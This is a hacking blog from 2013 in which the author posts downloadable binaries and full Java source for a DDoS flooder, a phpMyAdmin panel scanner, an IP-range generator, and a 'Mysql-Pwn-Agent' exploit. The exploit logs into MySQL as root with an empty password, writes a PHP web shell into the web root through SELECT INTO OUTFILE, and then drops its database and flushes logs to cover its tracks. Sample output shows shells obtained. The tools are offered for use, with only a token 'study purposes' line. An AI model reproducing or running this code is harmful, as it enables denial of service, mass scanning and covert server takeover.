Tuesday, February 26, 2013

Thanks for 1337 Views

Posted by at Tuesday, February 26, 2013

1337

 

1337 Thanks Zwinkerndes Smiley

 

 

1337 hacker (Bewiz) I love bewiz

Monday, February 25, 2013

DDOS-AGENT JAVA

Posted by at Monday, February 25, 2013

ddos-website-what-to-do

Hi All Today i Tested some DDoS ATTacKs on my Xampp Sever,after a while i found some java sample source for DDoS.

I found some GET / HTTP/1.1 tcp syn attack but i think its gay.With the GET / HTTP/1.1 apache.exe got 4 % Cpu Load.If you connect too much your connect will be killed.

 

After a while i got a idee why not flood the Server with GET HEAD+Set User Agent.After 10 Mins Coding DDoS-Agent is Born.

 

Here Some Proofs :

Tested it on a Friends Cpu my Cpu are tooo Slow for it AMD X2 2600 ghz 2gb Ram ………

FriendSystem : AMD X6 3500ghz

FriendRam :16gb

Unbenannt

6 x Times Started a DDoS Attack on the Xampp Server with default conf.

 

ApacheHttpServer.exe goes to 60-80 %.With a bigger UserAgent Buffer you can make up to 15mb/s write speed on acess.log.I used a small one just 1mbs.

Download :

http://www.mirrorupload.net/file/IRXHYSDS/#!ddos.exe

 

Source:

Dos.java

package com;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.Socket;
import java.util.Scanner;


/**
* Created by Simple IDEA.
* User: cr4shyyyyy
* Date: 23-02-2013
* Time: 21:10:28
*/
public class dos extends Socket implements Runnable {
static dos _instance = new dos();

public static void main(String[] args) {
//for (int i = 0; i < 2; i++)
new Thread(_instance).start();
}

public void run() {
Scanner scanner = new Scanner(System.in);
System.out.println("Welcome to User-Agent-DDoS by cr4shyyy : ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");
System.out.println(" ");
System.out.println("Please Enter Ip to UserAgent-DDoS : ");
String eingabe = scanner.nextLine();
String TARGET = eingabe;
if(eingabe == null || eingabe.length() == 0) {
System.out.println("Enter range n000b ........");
}

for (int i = 1; i < 1000000; i++) {
if ((checkshell.exists("http://"+TARGET+"")) == true) {
System.out.println("Fucked You " + i+" Times with " +i+" Connection !!!");
}
else{
if ((checkshell.exists("http://"+TARGET+"")) == false) {
System.out.println("Error after " +i+" Connection !!!");
}
}

}
}

public static void sendRawLine(String text, Socket sock) {
try {
BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
out.write(text + " ");
out.flush();
} catch (IOException ex) {
System.out.println("Bitch Offline ....");
//ex.printStackTrace();
}
}
}


checkchell.java



package com;
import java.net.*;

public class checkshell {
/**
* Created by Simple IDEA.
* User: cr4shyyyyy
* Date: 23-02-2013
* Time: 21:10:28
*/
public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
String evilPayload = org.apache.commons.lang3.RandomStringUtils.randomAlphanumeric(1*3*3*7);
//System.out.println(evilPayload);


String userAgentPayload = "UserAgentDDOS by cr4shhyyy from http://security-is-just-an-illusion.blogspot.de/"+evilPayload;
int TIMEOUT_VALUE = 0;
try {
HttpURLConnection.setFollowRedirects(false);
HttpURLConnection con =(HttpURLConnection) new URL(URLName).openConnection();
con.setInstanceFollowRedirects(false);
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
con.setConnectTimeout(TIMEOUT_VALUE);
con.setRequestMethod("HEAD");
con.addRequestProperty("User-Agent", userAgentPayload);
con.disconnect();
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}



catch (Exception e) {
System.out.println("Bitch Offline ....");
//e.printStackTrace();
return false;
}
}
}


Use it for Personal use or study purposes.

Saturday, February 23, 2013

PhpMyAdmin-Directory Buster v1.0

Posted by at Saturday, February 23, 2013

I was a little bored , and I thought I would write even a path brute force tool for phpMyAdmin.

All Hacker Know it where the hell is the Next Target ..? The Only way to find a Target are Scannning your Local Network Zwinkerndes Smiley

Billions of Server Running PhpMyadmin you only need to find it.Google can help you to find some interfaces with Dorks but you can do it by your self.

Im a n00by dont blame me for my coding skill …. I Never Never learning any Coding Language.I Just learn from Google & friends thanks to the people how fill the Internet.

Here my Paint Poc:

next

After a week i thing its done.I Hope it is Zwinkerndes Smiley …..

Download Compiled .exe & .jar :

http://www.mirrorupload.net/file/1GLG7SAF/#!PhpMyAdmin-Directory_Buster.rar

 

Source Code :

scanner.java

package crashyyy;

import java.io.BufferedReader;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;
import java.net.URL;
import crashyyy.AePlayWave;

import crashyyy.checkshell;

public class scanner {

/**
* @param args
*/
public static void main(String[] args) {
int TIMEOUT_VALUE = 4000;
String userAgent = "PhpMyAdmin Hunter by cr4shyyy from http://security-is-just-an-illusion.blogspot.de";

try{
FileInputStream dirstream123 = new FileInputStream("ip.txt");
DataInputStream dir23 = new DataInputStream(dirstream123);
BufferedReader b123 = new BufferedReader(new InputStreamReader(dir23));
String strLine123;
while ((strLine123 = b123.readLine()) != null) {
String ips = strLine123;
Socket s = new Socket();
try {
int port = 80;

FileWriter securewriter;
File file;
file = new File("secure.txt");
securewriter = new FileWriter(file ,true);

FileWriter insecurewriter;
File file0;
file0 = new File("insecure.txt");
insecurewriter = new FileWriter(file0 ,true);


System.out.println("---------------------------------------------------");
System.out.println("[inFoo] Testing Port " + port +" From IP "+ips);

SocketAddress sockaddr = new InetSocketAddress(ips, port);
s.connect(sockaddr, 100);
s.setReceiveBufferSize(1024);
s.setSendBufferSize(1024);

System.out.println("[inFoo] >>> Port OK <<<");

FileInputStream dirstream1233 = new FileInputStream("paths.txt");
DataInputStream dir233 = new DataInputStream(dirstream1233);
BufferedReader b1233 = new BufferedReader(new InputStreamReader(dir233));
String strLine1233;
while ((strLine1233 = b1233.readLine()) != null) {
String paths = strLine1233;

System.out.println("[inFoo] Start PhpMyadmin Check "+"http://"+ips+""+paths+"sql.php");
if ((checkshell.exists("http://"+ips+""+paths+"sql.php")) == true) {
String w00t = "http://"+ips+""+paths+"sql.php";
try{
HttpURLConnection con =
(HttpURLConnection) new URL(w00t).openConnection();
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
con.addRequestProperty("User-Agent", userAgent);
BufferedReader in = new BufferedReader(new InputStreamReader(con.getInputStream()));
con.connect();
while ((w00t = in.readLine()) != null)
if (w00t.contains("var input_username = document.getElementById('input_username')")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] Secure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
securewriter.write("http://"+ips+""+""+paths+"sql.php");
//securewriter.write(w00t);
securewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
securewriter.flush();
securewriter.close();
break;
}
else{
if (w00t.contains("var uname = document.forms['login_form'].elements['pma_username']")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] Secure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
securewriter.write("http://"+ips+""+""+paths+"sql.php");
//securewriter.write(w00t);
securewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
securewriter.flush();
securewriter.close();
break;
}
else{
if (w00t.contains("<!-- Login form -->")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] Secure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
securewriter.write("http://"+ips+""+""+paths+"sql.php");
//securewriter.write(w00t);
securewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
securewriter.flush();
securewriter.close();
break;
}
else{
if (w00t.contains("<!-- MySQL and phpMyAdmin related links -->")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] InSecure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
insecurewriter.write("http://"+ips+""+""+paths+"sql.php");
insecurewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
insecurewriter.flush();
insecurewriter.close();
break;
}
else{
if (w00t.contains("<!-- phpMyAdmin related links -->")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] By Security-is-just-an-illusion.blogspot.de");
System.out.println("[inFoo] Phpmyadmin Found : "+"http://"+ips+""+""+paths+"sql.php");
System.out.println("[inFoo] InSecure Login Found");
System.out.println("---------------------------------------------------");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
insecurewriter.write("http://"+ips+""+""+paths+"sql.php");
insecurewriter.write(System.getProperty("line.separator"));
AePlayWave aw = new AePlayWave( "found.wav" );
aw.start();
insecurewriter.flush();
insecurewriter.close();
break;
}
else{
if (w00t.contains("Forbidden")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] "+w00t+" 403 Forbidden Skip");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
}
else{
if (w00t.contains("404")){
System.out.println("---------------------------------------------------");
System.out.println("[inFoo] "+w00t+" 404 Not Found Skip");
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
}
FileWriter writer;
File file9;
file9 = new File("debug.txt");
writer = new FileWriter(file9 ,true);
writer.write("---------------------------------------------------");
writer.write(System.getProperty("line.separator"));
writer.write("http://"+ips+""+""+paths+"sql.php");
writer.write(System.getProperty("line.separator"));
writer.write(w00t);
writer.write(System.getProperty("line.separator"));
writer.write("---------------------------------------------------");
writer.write(System.getProperty("line.separator"));
writer.flush();
writer.close();
}
}
}
}
}
}
} finally {
}
}
}
} catch (IOException e) {
//System.out.println("---------------------------------------------------");
System.out.println("[inFoo] OFFLINE !!! SKIP !!! ");
//System.out.println(s.getSoTimeout());
System.out.println("---------------------------------------------------");
} finally {
if( s != null){
try {
s.close();
} catch (IOException e) {
throw new RuntimeException("You should handle this error." , e);
}
}//end try

//END
}
}

} catch (FileNotFoundException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}finally{
System.out.println("[inFoo] Goodbye by http://security-is-just-an-illusion.blogspot.de!");
System.out.println("---------------------------------------------------");
}
}
}


checkshell.java



package crashyyy;
import java.net.*;
import java.util.Properties;

public class checkshell {

public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
String userAgent = "Google.com CrawlBot";
int TIMEOUT_VALUE = 2000;
try {
HttpURLConnection.setFollowRedirects(false);
HttpURLConnection con =
(HttpURLConnection) new URL(URLName).openConnection();
con.setInstanceFollowRedirects(false);
con.setConnectTimeout(TIMEOUT_VALUE);
con.setReadTimeout(TIMEOUT_VALUE);
con.setConnectTimeout(2000); //set timeout to 5 seconds
con.setRequestMethod("HEAD");
con.addRequestProperty("User-Agent", userAgent);
con.disconnect();
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}

catch (Exception e) {
//e.printStackTrace();
return false;
}
}
}


AePlayWave.java //Play a Sound file if a Result are Found.



package crashyyy;
import java.io.File;
import java.io.IOException;
import javax.sound.sampled.AudioFormat;
import javax.sound.sampled.AudioInputStream;
import javax.sound.sampled.AudioSystem;
import javax.sound.sampled.DataLine;
import javax.sound.sampled.FloatControl;
import javax.sound.sampled.LineUnavailableException;
import javax.sound.sampled.SourceDataLine;
import javax.sound.sampled.UnsupportedAudioFileException;

public class AePlayWave extends Thread {

private String filename;

private Position curPosition;

private final int EXTERNAL_BUFFER_SIZE = 524288; // 128Kb

enum Position {
LEFT, RIGHT, NORMAL
};

public AePlayWave(String wavfile) {
filename = wavfile;
curPosition = Position.NORMAL;
}

public AePlayWave(String wavfile, Position p) {
filename = wavfile;
curPosition = p;
}

public void run() {

File soundFile = new File(filename);
if (!soundFile.exists()) {
System.err.println("Wave file not found: " + filename);
return;
}

AudioInputStream audioInputStream = null;
try {
audioInputStream = AudioSystem.getAudioInputStream(soundFile);
} catch (UnsupportedAudioFileException e1) {
e1.printStackTrace();
return;
} catch (IOException e1) {
e1.printStackTrace();
return;
}

AudioFormat format = audioInputStream.getFormat();
SourceDataLine auline = null;
DataLine.Info info = new DataLine.Info(SourceDataLine.class, format);

try {
auline = (SourceDataLine) AudioSystem.getLine(info);
auline.open(format);
} catch (LineUnavailableException e) {
e.printStackTrace();
return;
} catch (Exception e) {
e.printStackTrace();
return;
}

if (auline.isControlSupported(FloatControl.Type.PAN)) {
FloatControl pan = (FloatControl) auline
.getControl(FloatControl.Type.PAN);
if (curPosition == Position.RIGHT)
pan.setValue(1.0f);
else if (curPosition == Position.LEFT)
pan.setValue(-1.0f);
}

auline.start();
int nBytesRead = 0;
byte[] abData = new byte[EXTERNAL_BUFFER_SIZE];

try {
while (nBytesRead != -1) {
nBytesRead = audioInputStream.read(abData, 0, abData.length);
if (nBytesRead >= 0)
auline.write(abData, 0, nBytesRead);
}
} catch (IOException e) {
e.printStackTrace();
return;
} finally {
auline.drain();
auline.close();
}

}
}








Use it for Personal use or study purposes.

IpRange-Gen-Agent

Posted by at Saturday, February 23, 2013

Here my Next Simple release IpRange-Gen-Agent,some times you need to generate some IpRange.If not you dont need it Zwinkerndes Smiley

 

Download Compiled Exe:

http://www.directmirror.com/files/0AEGWHLT

http://www.mirrorupload.net/file/IWPJRHWC/#!iprange-gen.rar

 

main.java

package com;

import java.io.File;
import java.io.FileWriter;
import java.util.Scanner;

/**
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS''
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/

/**
* This class contains methods to generate IP Address(IPV4) Sequence.
*/
public class main {

/**
* Program starts here
*
* @param args
* @throws Exception
*/
public static void main(String[] args) throws Exception {
Scanner scanner = new Scanner(System.in);
System.out.println("Welcome to IpRange-Gen-Agent by cr4shyyy : ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");
System.out.println(" ");
System.out.println("Please Enter Ip Range : ");
System.out.println("Enter '127.0.0.1' its gen IP-Range to '127.255.255.255: ");
String eingabe = scanner.nextLine();

main ipGen = new main();
String ipStartingSeq = ""+ eingabe;
if(eingabe == null || eingabe.length() == 0) { /* DO STUFF */
System.out.println("Enter range n000b ........");
}
else{
// 256*256*256 = 16777216 Ips 1 FullRange
int numberOfIP = 16777216;
ipGen.generateNextIPSequence(ipStartingSeq, numberOfIP);
scanner.close();
}

}

public void generateNextIPSequence(String address, int count)
throws Exception {
String nextIpAddress = address;
for (int i = 0; i < count; i++) {
System.out.println(nextIpAddress);
//File writer for Ips
FileWriter writer;
File file;
file = new File("ip.txt");
writer = new FileWriter(file ,true);
writer.write(""+nextIpAddress);
writer.write(System.getProperty("line.separator"));
writer.flush();
writer.close();
nextIpAddress = getNextIPAddress(nextIpAddress);

}
}

public String[] getPartsOfIpAddress(String ipAddress) {
String[] elements = ipAddress.split("\\.");

return elements;
}

public String getNextIPAddress(String ipAddress) throws Exception {

String[] elements = getPartsOfIpAddress(ipAddress);
if (elements != null && elements.length == 4) {
Integer part1 = Integer.parseInt(elements[0]);
Integer part2 = Integer.parseInt(elements[1]);
Integer part3 = Integer.parseInt(elements[2]);
Integer part4 = Integer.parseInt(elements[3]);
if (part4 < 255) {
String ip = part1 + "." + part2 + "." + part3 + "." + (++part4);
return ip;
} else if (part4 == 255) {
if (part3 < 255) {
String ip = part1 + "." + part2 + "." + (++part3) + "."
+ (0);
return ip;
} else if (part3 == 255) {
if (part2 < 255) {
String ip = part1 + "." + (++part2) + "." + (0) + "."
+ (0);
return ip;
} else if (part2 == 255) {
if (part1 < 255) {
String ip = (++part1) + "." + (0) + "." + (0) + "."
+ (0);
return ip;
} else if (part1 == 255) {
throw new Exception("IP Range Exceeded -> "+ipAddress);
}
}
}
}
}

return null;
}
}


 



Have pfun …….

Saturday, February 9, 2013

Mysql-Pwn-Agent Beta

Posted by at Saturday, February 09, 2013

 

Hello and Good morning to all readers. I get up quite early today and in fact I slept very late last night. argh..

But im done with Mysql-Pwn-Agent Beta.

Mysql Pwn Agent is a Mysql + Any Win Http Server Auto Exploite,i use (XAMPP) for testings.

Here is my simple Poc=Proof of Concept

.           Paint wtf Zwinkerndes Smiley

 

Unbenannt

 

After some days playing with java jdbc and Xampp Mysql and Apache.

I finished writing the exploit thanks to Yeohwa for some hints.

Here some Screenshots.

We need some Test-Server Start Xampp + Apache Web Server + Mysql Database

 

xampp

 

Get the Exploit and add some IP´s to scan.txt.Add your php shell code base64 encode to shell.txt Start the Exploit.You can use php/reverse/metapreter/ from metasploit to get some reverse shell but it suckz on my online check shell class because phpmetasploit reverse shell never stop loading.Better use any php-shell  or my simple upload script.

 

input

The POC-Exploit:

 

exploit

 

Exploit Output if she fail.Creating Random Database+Tables all the time.She use dir.txt to brute the htdocs root dir from Apache to upload the shell and check if shell online.

 

#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database rcdmiwb
Creating Table rcdmiwb
rcdmiwb Table created successfully...
rcdmiwb Connecting to database rcdmiwb Again...
Insert Shell Into Table rcdmiwb...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\rcdmiwb.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database bffatwe
Creating Table bffatwe
bffatwe Table created successfully...
bffatwe Connecting to database bffatwe Again...
Insert Shell Into Table bffatwe...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\bffatwe.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################






Exploit Output if she WIN.



#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database tdduvjs
Creating Table tdduvjs
tdduvjs Table created successfully...
tdduvjs Connecting to database tdduvjs Again...
Insert Shell Into Table tdduvjs...
Creating outfile to hdd...
Upload /xampp/htdocs/tdduvjs.php Done...
Successfully Exploit Done ...
Connecting to database tdduvjs Again...
Drop Database tdduvjs...
Successfully Dropped tdduvjs Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database memaarx
Creating Table memaarx
memaarx Table created successfully...
memaarx Connecting to database memaarx Again...
Insert Shell Into Table memaarx...
Creating outfile to hdd...
Upload /xampp/htdocs/memaarx.php Done...
Successfully Exploit Done ...
Connecting to database memaarx Again...
Drop Database memaarx...
Successfully Dropped memaarx Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!


Now she find the root doc and we WIN and got your shells ready Zwinkerndes Smiley



Look into results.txt there are the saved shells.



#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
Shell Date: 09.02.2013 12:15
#######################################################################

#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
Shell Date: 09.02.2013 12:15
#######################################################################


The Result with base64 encode Upload Script :



uploadscript



YeahhhHhhh we got a upload script to upload your shell.Nothing new … Zwinkerndes Smiley



Have pfun



main.java



package sploit;

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.sql.Connection;
import java.sql.Date;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.sql.Statement;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.GregorianCalendar;
import java.util.Random;
import java.util.Scanner;

import sploit.checkshell;

public class main {
// JDBC driver name and database URL
static String output = null;
static String outputshell = null;

// Database credentials
static final String USER = "root";
static final String PASS = "";

/**
* @param args
* @throws IOException
*/



public static void main(String[] args) throws IOException {
System.out.println(" Mysql-Pwn-Agent-Exploit Beta 1 ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");

System.out.print("Press 2x Enter to fire ...");
Scanner sc = new Scanner(System.in);
while(!sc.nextLine().equals(""));
sc.nextLine();
sc.close();

// Open the file that is the first
// command line parameter
FileInputStream dirstream10 = new FileInputStream("shell.txt");
// Get the object of DataInputStream
DataInputStream dir0 = new DataInputStream(dirstream10);
BufferedReader b10 = new BufferedReader(new InputStreamReader(dir0));
String strLine10;
//Read File Line By Line

//Read File Line By Line
while ((strLine10 = b10.readLine()) != null) {
// Print the content on the console
String shell = strLine10;
//System.out.println (shell);

try{
// Open the file that is the first
// command line parameter
FileInputStream dirstream1 = new FileInputStream("dir.txt");
// Get the object of DataInputStream
DataInputStream dir = new DataInputStream(dirstream1);
BufferedReader b1 = new BufferedReader(new InputStreamReader(dir));
String strLine1;
//Read File Line By Line

//Read File Line By Line
while ((strLine1 = b1.readLine()) != null) {
// Print the content on the console
String dirbrute = strLine1;
//System.out.println (strLine1);


// Open the file that is the first
// command line parameter
FileInputStream fstream = new FileInputStream("scan.txt");
// Get the object of DataInputStream
DataInputStream in = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in));
String strLine;


while ((strLine = br.readLine()) != null) {
// Print the content on the console
//System.out.println (strLine);

//Main Connect to db
Connection conn = null;
Statement stmt = null;
try{
//STEP 1: Init Random
Random ran = new Random();
int top = 6;
char data = ' ';
String dat = "";

for (int i=0; i<=top; i++) {
data = (char)(ran.nextInt(25)+97);
dat = data + dat;
}

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");
final String DB_URL = "jdbc:mysql://"+strLine+"/";
final String DB_URL3 = "jdbc:mysql://"+strLine+"/"+dat+"";
final String DB_URL2 = "jdbc:mysql://"+strLine+"/"+dat+"";


//STEP 3: Open a connection
System.out.println("#######################################################################");
System.out.println("###########################by cr4shyyy#################################");
System.out.println("#######################################################################");
System.out.println("Connecting to database..."+strLine);

conn = DriverManager.getConnection(DB_URL, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Creating database "+dat);
stmt = conn.createStatement();
String sql = "CREATE DATABASE "+dat;
stmt.executeUpdate(sql);
//System.out.println("Done...");

System.out.println("Creating Table "+dat);
String sql2 = "CREATE TABLE `"+dat+"`.`user_upload` (`track2` VARCHAR( 55060 ) NOT NULL) ENGINE = MYISAM ;";
stmt.executeUpdate(sql2);
//System.out.println("Done...");
System.out.println(dat+" Table created successfully...");

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");

//STEP 3: Open a connection
System.out.println(dat+" Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL2, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Insert Shell Into Table "+dat+"...");
stmt = conn.createStatement();
String sql0 = "INSERT INTO user_upload " + "VALUES ('<?php sleep(10);" +shell+ "" + " ?>')";
stmt.executeUpdate(sql0);
//System.out.println("Done...");



System.out.println("Creating outfile to hdd...");
String sql4 = "select * into outfile 'C:"+""+dirbrute+""+dat.toString() +".php'" + "from user_upload";

stmt.executeQuery(sql4);

System.out.println("Upload "+strLine1+""+ dat +".php Done...");
System.out.println("Successfully Exploit Done ...");


//STEP 3: Open a connection
System.out.println("Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL3, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Drop Database "+dat+"...");
stmt = conn.createStatement();
String sql01 = "DROP DATABASE "+dat;
stmt.executeUpdate(sql01);
//System.out.println("Done...");
System.out.println("Successfully Dropped "+dat+" Table ...");

System.out.println("Flush logs ...");
stmt = conn.createStatement();
String sql1 = "FLUSH LOGS";
stmt.executeUpdate(sql1);
